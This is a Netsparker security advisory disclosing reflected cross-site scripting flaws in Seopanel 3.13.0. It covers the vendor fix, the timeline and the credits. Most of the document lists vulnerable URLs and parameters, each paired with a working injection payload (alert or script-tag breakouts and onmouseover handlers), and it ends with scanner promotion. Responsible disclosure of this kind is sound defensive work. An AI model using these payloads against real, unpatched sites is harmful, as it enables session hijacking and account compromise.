Seopanel 3.13.0 Cross Site Scripting

`  
Multiple Reflected Cross-site Scripting Vulnerabilities in Seopanel 3.13.0  
  
Information  
--------------------  
  
Advisory by Netsparker  
Name: Reflected Cross-site Scripting Vulnerabilities in Seopanel  
Affected Software: Seopanel  
Affected Versions: 3.13.0  
Homepage: https://www.seopanel.in  
Vulnerability: Multiple Reflected Cross-site Scripting Vulnerabilities  
Severity: Medium  
Status: Fixed  
CVSS Score (3.0): 6.3  
Netsparker Advisory Reference: NS-18-022  
  
Technical Details  
--------------------  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=show&nsparameter=aa');alert(1)//  
Paremeter Name: nsparameter  
Parameter Type: GET  
Attack Pattern: aa');alert(1)//  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?%27%2balert(0x00BCA2)%2b%27  
Parameter Name: Query Based  
Parameter Type: Query String  
Attack Pattern: %27%2balert(0x00BCA2)%2b%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=%27%252Balert(9)%252B%27&description=&keywords=  
Parameter Name: title  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=%2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x00B7E7%2529%253C%252FscRipt%253E&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=  
Parameter Name: sec  
Parameter Type: GET  
Attack Pattern: %2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x00B7E7%2529%253C%252FscRipt%253E  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=3&nsextt=%27%252Balert(9)%252B%27  
Parameter Name: nsextt  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=%27%252Balert(9)%252B%27&search_name=&stscheck=select  
Parameter Name: keyword  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=%27%252Balert(9)%252B%27&url=http%3A%2F%2F&title=&description=&keywords=&search_name=&stscheck=select  
Parameter Name: name  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=&search_name=%27%252Balert(9)%252B%27&stscheck=select  
Parameter Name: search_name  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=3&%27%2balert(0x0105C0)%2b%27=nsextt  
Parameter Name: nsparamname  
Parameter Type: GET  
Attack Pattern: %27%2balert(0x0105C0)%2b%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=%27%252Balert(9)%252B%27&sec=activate&theme_id=2&pageno=  
Parameter Name: start_script  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=%27%252Balert(9)%252B%27&stscheck=3  
Parameter Name: userid  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=%27%252Balert(9)%252B%27&title=&description=&keywords=  
Parameter Name: url  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=%27%252Balert(9)%252B%27  
Parameter Name: stscheck  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=themes-manager&sec=activate&theme_id=2&pageno=%27%252Balert(9)%252B%27  
Parameter Name: pageno  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=%27%252Balert(9)%252B%27&keywords=  
Parameter Name: description  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=themes-manager&sec=activate&theme_id=%27%252Balert(9)%252B%27&pageno=  
Parameter Name: theme_id  
Parameter Type: GET  
Attack Pattern: %27%252Balert(9)%252B%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/directories.php?sec=directorymgr&dir_name=&stscheck=1&capcheck=x%22%20onmouseover%3dalert(0x00BAF1)%20x%3d%22&pagerank=&langcode=  
Parameter Name: capcheck  
Parameter Type: GET  
Attack Pattern: x%22%20onmouseover%3dalert(0x00BAF1)%20x%3d%22  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/seo-plugins-manager.php?sec=listinfo&pid=1&pageno=x%22%20onmouseover%3dalert(0x00EC00)%20x%3d%22  
Parameter Name: pageno  
Parameter Type: GET  
Attack Pattern: x%22%20onmouseover%3dalert(0x00EC00)%20x%3d%22  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/settings.php?category=x%22%20onmouseover%3dalert(0x00B43C)%20x%3d%22  
Parameter Name: category  
Parameter Type: GET  
Attack Pattern: x%22%20onmouseover%3dalert(0x00B43C)%20x%3d%22  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/themes-manager.php?sec=activate&theme_id=2&pageno=%27%2balert(0x018E52)%2b%27  
Parameter Name: pageno  
Parameter Type: GET  
Attack Pattern: %27%2balert(0x018E52)%2b%27  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot  
Parameter Name: search_name  
Parameter Type: POST  
Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot  
Parameter Name: report_type  
Parameter Type: POST  
Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22  
  
URL: http://testcases-vdb.ns.local:8081/seopanel/seopanel-3.13.0/?'"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
Parameter Name: Query Based  
Parameter Type: Query String  
Attack Patern: '"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/index.php?'"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
Parameter Name: Query Based  
Parameter Type: Query String  
Attack Patern: '"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot  
Parameter Name: code  
Parameter Type: POST  
Attack Patern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?'"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
Parameter Name: Query Based  
Parameter Type: Query String  
Attack Patern: '"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot  
Parameter Name: email  
Parameter Type: POST  
Attack Patern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22  
  
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/support.php?'"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
Parameter Name: Query Based  
Parameter Type: Query String  
Attack Patern: '"--></style></scRipt><scRipt>netsparker(0x000CF8)</scRipt>  
  
For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).  
  
Advisory Timeline  
--------------------  
  
28th June 2018- First Contact  
13th September 2018 - Vendor Fixed  
30th November 2018 - Advisory Released  
  
Credits & Authors  
--------------------  
  
These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner.  
  
About Netsparker  
--------------------  
  
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.  
  
  
`